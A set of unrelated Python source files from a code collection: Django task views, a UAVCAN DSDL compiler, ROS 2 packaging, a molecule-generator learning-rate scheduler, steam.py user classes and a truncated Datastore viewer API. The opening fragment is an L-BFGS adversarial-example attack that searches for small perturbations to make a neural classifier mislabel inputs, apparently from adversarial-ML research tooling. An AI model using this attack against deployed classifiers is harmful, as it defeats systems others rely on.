return loss, grad.flatten().astype(float)
def attack_success(out, target, targeted_attack):
""" returns attack result """
if targeted_attack:
return out == target
else:
return out != target
# begin the main part for the attack
from scipy.optimize import fmin_l_bfgs_b
oimgs = np.clip(x_val, self.clip_min, self.clip_max)
CONST = np.ones(self.batch_size) * self.initial_const
# set the lower and upper bounds accordingly
lower_bound = np.zeros(self.batch_size)
upper_bound = np.ones(self.batch_size) * 1e10
# set the box constraints for the optimization function
clip_min = self.clip_min * np.ones(oimgs.shape[:])
clip_max = self.clip_max * np.ones(oimgs.shape[:])
clip_bound = list(zip(clip_min.flatten(), clip_max.flatten()))
# placeholders for the best l2 and instance attack found so far
o_bestl2 = [1e10] * self.batch_size
o_bestattack = np.copy(oimgs)
for outer_step in range(self.binary_search_steps):
_logger.debug(" Binary search step %s of %s",
outer_step, self.binary_search_steps)
# The last iteration (if we run many steps) repeat the search once.
if self.repeat and outer_step == self.binary_search_steps - 1:
CONST = upper_bound
# optimization function
adv_x, _, __ = fmin_l_bfgs_b(
lbfgs_objective,
oimgs.flatten().astype(float),
args=(self, targets, oimgs, CONST),
bounds=clip_bound,
maxiter=self.max_iterations,
iprint=0)
adv_x = adv_x.reshape(oimgs.shape)
assert np.amax(adv_x) <= self.clip_max and \
np.amin(adv_x) >= self.clip_min, \
'fmin_l_bfgs_b returns are invalid'
# adjust the best result (i.e., the adversarial example with the
# smallest perturbation in terms of L_2 norm) found so far
preds = np.atleast_1d(
utils_tf.model_argmax(self.sess, self.x, self.logits,
adv_x))
_logger.debug("predicted labels are %s", preds)
l2s = np.zeros(self.batch_size)
for i in range(self.batch_size):
l2s[i] = np.sum(np.square(adv_x[i] - oimgs[i]))
for e, (l2, pred, ii) in enumerate(zip(l2s, preds, adv_x)):
if l2 < o_bestl2[e] and attack_success(pred, np.argmax(targets[e]),
self.targeted_attack):
o_bestl2[e] = l2
o_bestattack[e] = ii
# adjust the constant as needed
for e in range(self.batch_size):
if attack_success(preds[e], np.argmax(targets[e]),
self.targeted_attack):
# success, divide const by two
upper_bound[e] = min(upper_bound[e], CONST[e])
if upper_bound[e] < 1e9:
CONST[e] = (lower_bound[e] + upper_bound[e]) / 2
else:
# failure, either multiply by 10 if no solution found yet
# or do binary search with the known upper bound
lower_bound[e] = max(lower_bound[e], CONST[e])
if upper_bound[e] < 1e9:
CONST[e] = (lower_bound[e] + upper_bound[e]) / 2
else:
CONST[e] *= 10
_logger.debug(" Successfully generated adversarial examples "
"on %s of %s instances.",
sum(upper_bound < 1e9), self.batch_size)
o_bestl2 = np.array(o_bestl2)
mean = np.mean(np.sqrt(o_bestl2[o_bestl2 < 1e9]))
_logger.debug(" Mean successful distortion: {:.4g}".format(mean))
# return the best solution found
o_bestl2 = np.array(o_bestl2)
return o_bestattack
|
the-stack_106_15869
|
import json
import datetime
import random
from picklefield import PickledObjectField
from django.shortcuts import render
from django.http import HttpResponse
from django_q.tasks import Async, schedule
from django_q.models import Schedule, Task
# Create your views here.
class CJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime("%Y-%m-%d")
else:
return json.JSONEncoder.default(self, obj)
def index(request):
return render(request, 'xxx/index.html', {})
def task_handler(request):
if request.method == 'GET':
tasks = list(Task.objects.values('id', 'name', 'started', 'stopped', 'result', 'group'))
return HttpResponse(json.dumps(tasks, cls=CJsonEncoder), content_type="application/json")
elif request.method == 'POST':
num = json.loads(str(request.body, 'utf-8')).get('num')
opts = {'task_name': 'fib' + str(num),
'group': 'fib'}
task_id = Async('xxx.tasks.fib', int(num), q_options=opts).run()
return HttpResponse({"task_id": task_id}, content_type="application/json")
def schedule_handler(request):
if request.method == 'GET':
schedules = list(Schedule.objects.values('name', 'schedule_type', 'next_run'))
return HttpResponse(json.dumps(schedules, cls=CJsonEncoder), content_type="application/json")
elif request.method == 'POST':
data = json.loads(str(request.body, 'utf-8'))
schedule_type = data.get('schedule_type')
name = data.get('name')
schedule('xxx.tasks.fib', random.randint(1, 38),
name=name,
schedule_type=schedule_type,
q_options={
'task_name': 'xxx',
'timeout': 60}
)
return HttpResponse({'name': name}, content_type="application/json")
|
the-stack_106_15872
|
#
# UAVCAN DSDL compiler for libuavcan
#
# Copyright (C) 2014 Pavel Kirienko <[email protected]>
#
'''
This module implements the core functionality of the UAVCAN DSDL compiler for libuavcan.
Supported Python versions: 3.2+, 2.7.
It accepts a list of root namespaces and produces the set of C++ header files for libuavcan.
It is based on the DSDL parsing package from pyuavcan.
'''
from __future__ import division, absolute_import, print_function, unicode_literals
import sys, os, logging, errno, re
from .pyratemp import Template
from uavcan import dsdl
# Python 2.7 compatibility
try:
str = unicode
except NameError:
pass
OUTPUT_FILE_EXTENSION = 'hpp'
OUTPUT_FILE_PERMISSIONS = 0o444 # Read only for all
TEMPLATE_FILENAME = os.path.join(os.path.dirname(__file__), 'data_type_template.tmpl')
__all__ = ['run', 'logger', 'DsdlCompilerException']
class DsdlCompilerException(Exception):
pass
logger = logging.getLogger(__name__)
def run(source_dirs, include_dirs, output_dir):
'''
This function takes a list of root namespace directories (containing DSDL definition files to parse), a
possibly empty list of search directories (containing DSDL definition files that can be referenced from the types
that are going to be parsed), and the output directory path (possibly nonexistent) where the generated C++
header files will be stored.
Note that this module features lazy write, i.e. if an output file does already exist and its content is not going
to change, it will not be overwritten. This feature allows to avoid unnecessary recompilation of dependent object
files.
Args:
source_dirs List of root namespace directories to parse.
include_dirs List of root namespace directories with referenced types (possibly empty). This list is
automaitcally extended with source_dirs.
output_dir Output directory path. Will be created if doesn't exist.
'''
assert isinstance(source_dirs, list)
assert isinstance(include_dirs, list)
output_dir = str(output_dir)
types = run_parser(source_dirs, include_dirs + source_dirs)
if not types:
die('No type definitions were found')
logger.info('%d types total', len(types))
run_generator(types, output_dir)
# -----------------
def pretty_filename(filename):
try:
a = os.path.abspath(filename)
r = os.path.relpath(filename)
return a if '..' in r else r
except ValueError:
return filename
def type_output_filename(t):
assert t.category == t.CATEGORY_COMPOUND
return t.full_name.replace('.', os.path.sep) + '.' + OUTPUT_FILE_EXTENSION
def makedirs(path):
try:
try:
os.makedirs(path, exist_ok=True) # May throw "File exists" when executed as root, which is wrong
except TypeError:
os.makedirs(path) # Python 2.7 compatibility
except OSError as ex:
if ex.errno != errno.EEXIST: # http://stackoverflow.com/questions/12468022
raise
def die(text):
raise DsdlCompilerException(str(text))
def run_parser(source_dirs, search_dirs):
try:
types = dsdl.parse_namespaces(source_dirs, search_dirs)
except dsdl.DsdlException as ex:
logger.info('Parser failure', exc_info=True)
die(ex)
return types
def run_generator(types, dest_dir):
try:
template_expander = make_template_expander(TEMPLATE_FILENAME)
dest_dir = os.path.abspath(dest_dir) # Removing '..'
makedirs(dest_dir)
for t in types:
logger.info('Generating type %s', t.full_name)
filename = os.path.join(dest_dir, type_output_filename(t))
text = generate_one_type(template_expander, t)
write_generated_data(filename, text)
except Exception as ex:
logger.info('Generator failure', exc_info=True)
die(ex)
def write_generated_data(filename, data):
dirname = os.path.dirname(filename)
makedirs(dirname)
# Lazy update - file will not be rewritten if its content is not going to change
if os.path.exists(filename):
with open(filename) as f:
existing_data = f.read()
if data == existing_data:
logger.info('Up to date [%s]', pretty_filename(filename))
return
logger.info('Rewriting [%s]', pretty_filename(filename))
os.remove(filename)
else:
logger.info('Creating [%s]', pretty_filename(filename))
# Full rewrite
with open(filename, 'w') as f:
f.write(data)
try:
os.chmod(filename, OUTPUT_FILE_PERMISSIONS)
except (OSError, IOError) as ex:
logger.warning('Failed to set permissions for %s: %s', pretty_filename(filename), ex)
def type_to_cpp_type(t):
if t.category == t.CATEGORY_PRIMITIVE:
cast_mode = {
t.CAST_MODE_SATURATED: '::uavcan::CastModeSaturate',
t.CAST_MODE_TRUNCATED: '::uavcan::CastModeTruncate',
}[t.cast_mode]
if t.kind == t.KIND_FLOAT:
return '::uavcan::FloatSpec< %d, %s >' % (t.bitlen, cast_mode)
else:
signedness = {
t.KIND_BOOLEAN: '::uavcan::SignednessUnsigned',
t.KIND_UNSIGNED_INT: '::uavcan::SignednessUnsigned',
t.KIND_SIGNED_INT: '::uavcan::SignednessSigned',
}[t.kind]
return '::uavcan::IntegerSpec< %d, %s, %s >' % (t.bitlen, signedness, cast_mode)
elif t.category == t.CATEGORY_ARRAY:
value_type = type_to_cpp_type(t.value_type)
mode = {
t.MODE_STATIC: '::uavcan::ArrayModeStatic',
t.MODE_DYNAMIC: '::uavcan::ArrayModeDynamic',
}[t.mode]
return '::uavcan::Array< %s, %s, %d >' % (value_type, mode, t.max_size)
elif t.category == t.CATEGORY_COMPOUND:
return '::' + t.full_name.replace('.', '::')
elif t.category == t.CATEGORY_VOID:
return '::uavcan::IntegerSpec< %d, ::uavcan::SignednessUnsigned, ::uavcan::CastModeSaturate >' % t.bitlen
else:
raise DsdlCompilerException('Unknown type category: %s' % t.category)
def generate_one_type(template_expander, t):
t.short_name = t.full_name.split('.')[-1]
t.cpp_type_name = t.short_name + '_'
t.cpp_full_type_name = '::' + t.full_name.replace('.', '::')
t.include_guard = t.full_name.replace('.', '_').upper() + '_HPP_INCLUDED'
# Dependencies (no duplicates)
def fields_includes(fields):
def detect_include(t):
if t.category == t.CATEGORY_COMPOUND:
return type_output_filename(t)
if t.category == t.CATEGORY_ARRAY:
return detect_include(t.value_type)
return list(sorted(set(filter(None, [detect_include(x.type) for x in fields]))))
if t.kind == t.KIND_MESSAGE:
t.cpp_includes = fields_includes(t.fields)
else:
t.cpp_includes = fields_includes(t.request_fields + t.response_fields)
t.cpp_namespace_components = t.full_name.split('.')[:-1]
t.has_default_dtid = t.default_dtid is not None
# Attribute types
def inject_cpp_types(attributes):
void_index = 0
for a in attributes:
a.cpp_type = type_to_cpp_type(a.type)
a.void = a.type.category == a.type.CATEGORY_VOID
if a.void:
assert not a.name
a.name = '_void_%d' % void_index
void_index += 1
if t.kind == t.KIND_MESSAGE:
inject_cpp_types(t.fields)
inject_cpp_types(t.constants)
t.all_attributes = t.fields + t.constants
t.union = t.union and len(t.fields)
else:
inject_cpp_types(t.request_fields)
inject_cpp_types(t.request_constants)
inject_cpp_types(t.response_fields)
inject_cpp_types(t.response_constants)
t.all_attributes = t.request_fields + t.request_constants + t.response_fields + t.response_constants
t.request_union = t.request_union and len(t.request_fields)
t.response_union = t.response_union and len(t.response_fields)
# Constant properties
def inject_constant_info(constants):
for c in constants:
if c.type.kind == c.type.KIND_FLOAT:
float(c.string_value) # Making sure that this is a valid float literal
c.cpp_value = c.string_value
else:
int(c.string_value) # Making sure that this is a valid integer literal
c.cpp_value = c.string_value
if c.type.kind == c.type.KIND_UNSIGNED_INT:
c.cpp_value += 'U'
if t.kind == t.KIND_MESSAGE:
inject_constant_info(t.constants)
else:
inject_constant_info(t.request_constants)
inject_constant_info(t.response_constants)
# Data type kind
t.cpp_kind = {
t.KIND_MESSAGE: '::uavcan::DataTypeKindMessage',
t.KIND_SERVICE: '::uavcan::DataTypeKindService',
}[t.kind]
# Generation
text = template_expander(t=t) # t for Type
text = '\n'.join(x.rstrip() for x in text.splitlines())
text = text.replace('\n\n\n\n\n', '\n\n').replace('\n\n\n\n', '\n\n').replace('\n\n\n', '\n\n')
text = text.replace('{\n\n ', '{\n ')
return text
def make_template_expander(filename):
'''
Templating is based on pyratemp (http://www.simple-is-better.org/template/pyratemp.html).
The pyratemp's syntax is rather verbose and not so human friendly, so we define some
custom extensions to make it easier to read and write.
The resulting syntax somewhat resembles Mako (which was used earlier instead of pyratemp):
Substitution:
${expression}
Line joining through backslash (replaced with a single space):
${foo(bar(very_long_arument=42, \
second_line=72))}
Blocks:
% for a in range(10):
% if a == 5:
${foo()}
% endif
% endfor
The extended syntax is converted into pyratemp's through regexp substitution.
'''
with open(filename) as f:
template_text = f.read()
# Backslash-newline elimination
template_text = re.sub(r'\\\r{0,1}\n\ *', r' ', template_text)
# Substitution syntax transformation: ${foo} ==> $!foo!$
template_text = re.sub(r'([^\$]{0,1})\$\{([^\}]+)\}', r'\1$!\2!$', template_text)
# Flow control expression transformation: % foo: ==> <!--(foo)-->
template_text = re.sub(r'(?m)^(\ *)\%\ *(.+?):{0,1}$', r'\1<!--(\2)-->', template_text)
# Block termination transformation: <!--(endfoo)--> ==> <!--(end)-->
template_text = re.sub(r'\<\!--\(end[a-z]+\)--\>', r'<!--(end)-->', template_text)
# Pyratemp workaround.
# The problem is that if there's no empty line after a macro declaration, first line will be doubly indented.
# Workaround:
# 1. Remove trailing comments
# 2. Add a newline after each macro declaration
template_text = re.sub(r'\ *\#\!.*', '', template_text)
template_text = re.sub(r'(\<\!--\(macro\ [a-zA-Z0-9_]+\)--\>.*?)', r'\1\n', template_text)
# Preprocessed text output for debugging
# with open(filename + '.d', 'w') as f:
# f.write(template_text)
template = Template(template_text)
def expand(**args):
# This function adds one indentation level (4 spaces); it will be used from the template
args['indent'] = lambda text, idnt = ' ': idnt + text.replace('\n', '\n' + idnt)
# This function works like enumerate(), telling you whether the current item is the last one
def enum_last_value(iterable, start=0):
it = iter(iterable)
count = start
last = next(it)
for val in it:
yield count, False, last
last = val
count += 1
yield count, True, last
args['enum_last_value'] = enum_last_value
return template(**args)
return expand
|
the-stack_106_15873
|
from setuptools import find_packages
from setuptools import setup
package_name = 'ros2component'
setup(
name=package_name,
version='0.12.0',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['ros2cli'],
zip_safe=True,
author='Michel Hidalgo',
author_email='[email protected]',
maintainer='Claire Wang, Mabel Zhang',
maintainer_email='[email protected], [email protected]',
url='https://github.com/ros2/ros2cli/tree/master/ros2component',
download_url='https://github.com/ros2/ros2cli/releases',
keywords=[],
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
],
description='The component command for ROS 2 command line tools.',
long_description="""\
The package provides the component command for the ROS 2 command line tools.""",
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'ros2cli.command': [
'component = ros2component.command.component:ComponentCommand',
],
'ros2cli.extension_point': [
'ros2component.verb = ros2component.verb:VerbExtension',
],
'ros2component.verb': [
'list = ros2component.verb.list:ListVerb',
'load = ros2component.verb.load:LoadVerb',
'standalone = ros2component.verb.standalone:StandaloneVerb',
'types = ros2component.verb.types:TypesVerb',
'unload = ros2component.verb.unload:UnloadVerb',
],
}
)
|
the-stack_106_15874
|
import numpy as np
import pandas as pd
__all__ = (
"one_ns_timedelta",
"one_s_timedelta",
"unix_begin_time"
)
one_ns_timedelta = pd.Timedelta(1)
one_s_timedelta = np.timedelta64(1, 's')
unix_begin_time = pd.Timestamp(0, unit='s')
|
the-stack_106_15875
|
import numpy as np
import scipy.stats as sps
import torch
import models.dataset as md
import models.model as mm
import utils.smiles as chem_smiles
from running_modes.configurations.general_configuration_envelope import GeneralConfigurationEnvelope
from running_modes.configurations.transfer_learning.adaptive_learning_rate_configuration import \
PromiscuityAdaptiveLearningRateConfiguration
from running_modes.transfer_learning.logging.transfer_learning_logger import TransferLearningLogger
from utils.enums.adaptive_learning_rate_enum import AdaptiveLearningRateEnum
class PromiscuityAdaptiveLearningRate:
def __init__(self, model: mm.Model, main_config: GeneralConfigurationEnvelope,
configuration: PromiscuityAdaptiveLearningRateConfiguration):
self._adaptive_learning_rate_enum = AdaptiveLearningRateEnum()
self._config = configuration
self._optimizer = torch.optim.Adam(model.network.parameters(), lr=self._config.start)
self._learning_rate_restarted_times = 0
self._logger = TransferLearningLogger(main_config)
self._lr_scheduler = self._initialize_lr_scheduler()
self._lr_adaptative_metric = []
self._data = {}
def _initialize_lr_scheduler(self):
if self._config.mode == self._adaptive_learning_rate_enum.EXPONENTIAL:
self._logger.log_message(f"Using exponential learning rate decay (gamma={self._config.gamma}, "
f"step={self._config.step})")
return torch.optim.lr_scheduler.StepLR(
self._optimizer, step_size=self._config.step, gamma=self._config.gamma)
elif self._config.mode == self._adaptive_learning_rate_enum.ADAPTIVE:
self._logger.log_message(f"Using adaptative learning rate decay (gamma={self._config.gamma}, "
f"threshold={self._config.threshold}, avg={self._config.average_steps})")
return torch.optim.lr_scheduler.ReduceLROnPlateau(
self._optimizer, mode="min", factor=self._config.gamma, patience=self._config.patience,
threshold=self._config.threshold)
else:
return None
def update_lr_scheduler(self, epoch):
if self._config.mode == self._adaptive_learning_rate_enum.EXPONENTIAL:
self._lr_scheduler.step(epoch=epoch)
if self._config.mode == self._adaptive_learning_rate_enum.ADAPTIVE:
metric = np.mean(self._lr_adaptative_metric[-self._config.average_steps:])
self._lr_scheduler.step(metric, epoch=epoch)
if self.get_lr() <= self._config.restart_value and self._config.restart_times > self._learning_rate_restarted_times:
self._logger.log_message(f"Learning rate restarted ({self._config.restart_times}): {self.get_lr()} "
f"-> {self._config.start}")
for param_group in self._optimizer.param_groups:
param_group['lr'] = self._config.start
self._learning_rate_restarted_times += 1
def get_lr(self):
return self._optimizer.param_groups[0]["lr"]
def get_jsd_joined_data(self):
return self._data["jsd_joined"]
def get_jsd_data(self):
return self._data["jsd"]
def learning_rate_is_valid(self):
return self.get_lr() >= self._config.min
def clear_gradient(self):
self._optimizer.zero_grad()
def optimizer_step(self):
self._optimizer.step()
def collect_stats(self, epoch, model_path, training_set_path, validation_set_path=None):
model = mm.Model.load_from_file(model_path, sampling_mode=True)
training_nlls = self._calc_nlls(model, training_set_path, self._config.sample_size)
training_nlls = self._amplify_dataset(training_nlls, self._config.sample_size)
sampled_smiles, sampled_nlls = self._sample_smiles_and_calculate_loss(model, self._config.sample_size)
if validation_set_path:
validation_nlls = self._calc_nlls(model, validation_set_path, self._config.sample_size)
validation_nlls = self._amplify_dataset(validation_nlls, self._config.sample_size)
self._update_nll_with_validation(sampled_nlls, validation_nlls, training_nlls)
else:
validation_nlls = None
self._update_nll(sampled_nlls=sampled_nlls, training_nlls=training_nlls)
self._logger.log_timestep(lr=self.get_lr(), epoch=epoch,
sampled_smiles=sampled_smiles,
sampled_nlls=sampled_nlls, validation_nlls=validation_nlls,
training_nlls=training_nlls,
jsd_data=self.get_jsd_data(),
jsd_joined_data=self.get_jsd_joined_data(), model=model)
self._lr_adaptative_metric.append(self.get_jsd_joined_data())
def _smiles_to_mols(self, smiles):
smiles_and_mols = [(smi, chem_smiles.to_mol(smi)) for smi in smiles]
return smiles_and_mols
def _sample_smiles_and_calculate_loss(self, model, sample_size):
sampled_smis, sampled_nlls = model.sample_smiles(num=sample_size)
return sampled_smis, sampled_nlls
def _calc_nlls(self, model, path, sample_size):
return np.concatenate(
list(md.calculate_nlls_from_model(model, chem_smiles.read_smiles_file(path, num=sample_size))[0]))
def _update_nll_with_validation(self, sampled_nlls, validation_nlls, training_nlls):
def jsd(dists):
num_dists = len(dists)
avg_dist = np.sum(dists, axis=0) / num_dists
return np.sum([sps.entropy(dist, avg_dist) for dist in dists]) / num_dists
self._data["jsd"] = {
"sampled.validation": jsd([sampled_nlls, validation_nlls]),
"sampled.training": jsd([sampled_nlls, training_nlls]),
"training.validation": jsd([training_nlls, validation_nlls])
}
self._data["jsd_joined"] = jsd([sampled_nlls, training_nlls, validation_nlls])
def _update_nll(self, sampled_nlls, training_nlls):
def jsd(dists):
num_dists = len(dists)
avg_dist = np.sum(dists, axis=0) / num_dists
return np.sum([sps.entropy(dist, avg_dist) for dist in dists]) / num_dists
self._data["jsd"] = {"sampled.training": jsd([sampled_nlls, training_nlls])}
self._data["jsd_joined"] = jsd([sampled_nlls, training_nlls])
def _amplify_dataset(self, training_nlls: np.array, target_size: int):
training_set_length = len(training_nlls)
if training_set_length < target_size:
delta = target_size - training_set_length
padding = []
counter = 0
for i in range(delta):
padding.append(training_nlls[counter])
if training_set_length == (counter + 1):
counter = 0
else:
counter += 1
training_nlls = np.concatenate([training_nlls, padding])
return training_nlls
def log_out_inputs(self):
self._logger.log_out_input_configuration()
|
the-stack_106_15876
|
"""
The MIT License (MIT)
Copyright (c) 2020 James
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import annotations
import asyncio
from collections.abc import Coroutine
from datetime import timedelta
from typing import TYPE_CHECKING, Any
from .abc import BaseUser, Messageable, UserDict
from .enums import TradeOfferState
from .errors import ClientException, ConfirmationError
from .models import URL
from .profile import OwnedProfileItems, ProfileItem
if TYPE_CHECKING:
from .clan import Clan
from .game import Game
from .group import Group
from .image import Image
from .message import UserMessage
from .state import ConnectionState
from .trade import Inventory, TradeOffer
__all__ = (
"User",
"ClientUser",
)
class User(BaseUser, Messageable["UserMessage"]):
"""Represents a Steam user's account.
.. container:: operations
.. describe:: x == y
Checks if two users are equal.
.. describe:: str(x)
Returns the user's name.
Attributes
----------
name
The user's username.
state
The current persona state of the account (e.g. LookingToTrade).
game
The Game instance attached to the user. Is ``None`` if the user isn't in a game or one that is recognised by the
api.
avatar_url
The avatar url of the user. Uses the large (184x184 px) image url.
real_name
The user's real name defined by them. Could be ``None``.
primary_clan
The user's primary clan.
created_at
The time at which the user's account was created. Could be ``None``.
last_logon
The last time the user logged into steam. This is only ``None`` if user hasn't been updated from the websocket.
last_logoff
The last time the user logged off from steam. Could be ``None`` (e.g. if they are currently online).
last_seen_online
The last time the user could be seen online. This is only ``None`` if user hasn't been updated from the
websocket.
country
The country code of the account. Could be ``None``.
flags
The persona state flags of the account.
"""
__slots__ = ()
async def add(self) -> None:
"""Sends a friend invite to the user to your friends list."""
await self._state.http.add_user(self.id64)
async def remove(self) -> None:
"""Remove the user from your friends list."""
await self._state.http.remove_user(self.id64)
try:
self._state.client.user.friends.remove(self)
except ValueError:
pass
async def cancel_invite(self) -> None:
"""Cancels an invite sent to the user. This effectively does the same thing as :meth:`remove`."""
await self._state.http.remove_user(self.id64)
async def block(self) -> None:
"""Blocks the user."""
await self._state.http.block_user(self.id64)
async def unblock(self) -> None:
"""Unblocks the user."""
await self._state.http.unblock_user(self.id64)
async def escrow(self, token: str | None = None) -> timedelta | None:
"""Check how long any received items would take to arrive. ``None`` if the user has no escrow or has a
private inventory.
Parameters
----------
token
The user's trade offer token, not required if you are friends with the user.
"""
resp = await self._state.http.get_user_escrow(self.id64, token)
their_escrow = resp["response"].get("their_escrow")
if their_escrow is None: # private
return None
seconds = their_escrow["escrow_end_duration_seconds"]
return timedelta(seconds=seconds) if seconds else None
def _message_func(self, content: str) -> Coroutine[Any, Any, UserMessage]:
return self._state.send_user_message(self.id64, content)
def _image_func(self, image: Image) -> Coroutine[Any, Any, None]:
return self._state.http.send_user_image(self.id64, image)
async def send(
self,
content: Any = None,
*,
trade: TradeOffer | None = None,
image: Image | None = None,
) -> UserMessage | None:
"""Send a message, trade or image to an :class:`User`.
Parameters
----------
content
The message to send to the user.
trade
The trade offer to send to the user.
Note
----
This will have its :attr:`~steam.TradeOffer.id` attribute updated after being sent.
image
The image to send to the user.
Raises
------
:exc:`~steam.HTTPException`
Sending the message failed.
:exc:`~steam.Forbidden`
You do not have permission to send the message.
Returns
-------
The sent message only applicable if ``content`` is passed.
"""
message = await super().send(content, image)
if trade is not None:
to_send = [item.to_dict() for item in trade.items_to_send]
to_receive = [item.to_dict() for item in trade.items_to_receive]
resp = await self._state.http.send_trade_offer(self, to_send, to_receive, trade.token, trade.message or "")
trade._has_been_sent = True
needs_confirmation = resp.get("needs_mobile_confirmation", False)
trade._update_from_send(self._state, resp, self, active=not needs_confirmation)
if needs_confirmation:
for tries in range(5):
try:
await trade.confirm()
except ConfirmationError:
break
except ClientException:
await asyncio.sleep(tries * 2)
trade.state = TradeOfferState.Active
# make sure the trade is updated before this function returns
self._state._trades[trade.id] = trade
self._state._trades_to_watch.add(trade.id)
await self._state.wait_for_trade(trade.id)
self._state.dispatch("trade_send", trade)
return message
async def invite_to_group(self, group: Group) -> None:
"""Invites the user to a :class:`Group`.
Parameters
-----------
group
The group to invite the user to.
"""
await self._state.invite_user_to_group(self.id64, group.id)
async def invite_to_clan(self, clan: Clan) -> None:
"""Invites the user to a :class:`Clan`.
Parameters
-----------
clan
The clan to invite the user to.
"""
await self._state.http.invite_user_to_clan(self.id64, clan.id64)
async def owns(self, game: Game) -> bool:
"""Whether or not the game is owned by this user.
Parameters
----------
game
The game you want to check the ownership of.
"""
return self.id64 in await self._state.fetch_friends_who_own(game.id)
def is_friend(self) -> bool:
"""Whether or not the user is in the :class:`ClientUser`'s friends."""
return self in self._state.client.user.friends
class ClientUser(BaseUser):
"""Represents your account.
.. container:: operations
.. describe:: x == y
Checks if two users are equal.
.. describe:: str(x)
Returns the user's name.
Attributes
----------
name
The user's username.
friends
A list of the :class:`ClientUser`'s friends.
state
The current persona state of the account (e.g. LookingToTrade).
game
The Game instance attached to the user. Is ``None`` if the user isn't in a game or one that is recognised by
the api.
avatar_url
The avatar url of the user. Uses the large (184x184 px) image url.
real_name
The user's real name defined by them. Could be ``None``.
primary_clan
The user's primary clan. Could be ``None``
created_at
The time at which the user's account was created. Could be ``None``.
last_logon
The last time the user logged into steam. This is only ``None`` if user hasn't been updated from the websocket.
last_logoff
The last time the user logged off from steam. Could be ``None`` (e.g. if they are currently online).
last_seen_online
The last time the user could be seen online. This is only ``None`` if user hasn't been updated from the
websocket.
country
The country code of the account. Could be ``None``.
flags
The persona state flags of the account.
"""
# TODO more stuff to add https://github.com/DoctorMcKay/node-steamcommunity/blob/master/components/profile.js
__slots__ = ("friends", "_inventory_func")
def __init__(self, state: ConnectionState, data: UserDict):
super().__init__(state, data)
self.friends: list[User] = []
self._inventory_func = BaseUser.inventory
async def inventory(self, game: Game) -> Inventory:
return await self._inventory_func(self, game)
async def setup_profile(self) -> None:
"""Set up your profile if possible."""
if self.has_setup_profile():
return
params = {"welcomed": 1}
await self._state.http.get(URL.COMMUNITY / "my/edit", params=params)
async def clear_nicks(self) -> None:
"""Clears the client user's nickname/alias history."""
await self._state.http.clear_nickname_history()
async def profile_items(self) -> OwnedProfileItems:
"""Fetch all of the client user's profile items."""
items = await self._state.fetch_profile_items()
return OwnedProfileItems(
backgrounds=[
ProfileItem(self._state, background, um_name="ProfileBackground")
for background in items.profile_backgrounds
],
mini_profile_backgrounds=[
ProfileItem(self._state, mini_profile_background, um_name="MiniProfileBackground")
for mini_profile_background in items.mini_profile_backgrounds
],
avatar_frames=[
ProfileItem(self._state, avatar_frame, um_name="AvatarFrame") for avatar_frame in items.avatar_frames
],
animated_avatars=[
ProfileItem(self._state, animated_avatar, um_name="AnimatedAvatar")
for animated_avatar in items.animated_avatars
],
modifiers=[ProfileItem(self._state, modifier) for modifier in items.profile_modifiers],
)
async def edit(
self,
*,
name: str | None = None,
real_name: str | None = None,
url: str | None = None,
summary: str | None = None,
country: str | None = None,
state: str | None = None,
city: str | None = None,
avatar: Image | None = None,
) -> None:
"""Edit the client user's profile. Any values that aren't set will use their defaults.
Parameters
----------
name
The new name you wish to go by.
real_name
The real name you wish to go by.
url
The custom url ending/path you wish to use.
summary
The summary/description you wish to use.
country
The country you want to be from.
state
The state you want to be from.
city
The city you want to be from.
avatar
The avatar you wish to use.
Note
----
This needs to be at least 184px x 184px.
Raises
-------
:exc:`~steam.HTTPException`
Editing your profile failed.
"""
await self._state.http.edit_profile(name, real_name, url, summary, country, state, city, avatar)
|
the-stack_106_15877
|
import base64
import datetime
import json
import os
import uuid
from collections import defaultdict
import flask.views
from datastore_viewer.infrastructure import DatastoreViewerRepository
from datastore_viewer.infrastructure import get_client
from datastore_viewer.presentation.ui.api.encoder import DataStoreEntityJSONEncoder
class EntityView(flask.views.MethodView):
def get(self, project_name: str):
namespace = flask.request.args.get('namespace')
repository = DatastoreViewerRepository(
project_name=project_name,
namespace=namespace,
)
serialized_key = flask.request.args.get('key')
key_path = json.loads(base64.b64decode(serialized_key))
key = repository.build_key_by_flat_path(key_path=key_path)
entity = repository.fetch_entity(key=key)
return flask.jsonify({
'project_name': project_name,
'key':str(key),
'entity': str(entity)
})
class ProjectAPIView(flask.views.MethodView):
def get(self, project_name: str, kind: str):
per_page = int(flask.request.args.get('perPage', '25'))
page_number = int(flask.request.args.get('page', '1'))
order = flask.request.args.get('order', '')
encoder = DataStoreEntityJSONEncoder()
repository = DatastoreViewerRepository(project_name=project_name)
properties_by_kind = repository.fetch_parent_properties()
current_kind = kind
current_kind_properties = properties_by_kind.get(current_kind, [])
entities, total_count = repository.fetch_entities(
kind=current_kind,
per_page=per_page,
page_number=page_number,
orderBy=order,
)
entities_array = []
for entity in entities:
entities_array.append(
encoder.encode(
entity=entity,
property_names=current_kind_properties
)
)
entities_json = defaultdict(list)
entities_json['entityResults'] = entities_array
property_names = set()
for entity in entities:
property_names.update(entity.keys())
property_names = sorted(property_names)
entity_properties = []
for name in property_names:
entity_properties.append({
"name": name,
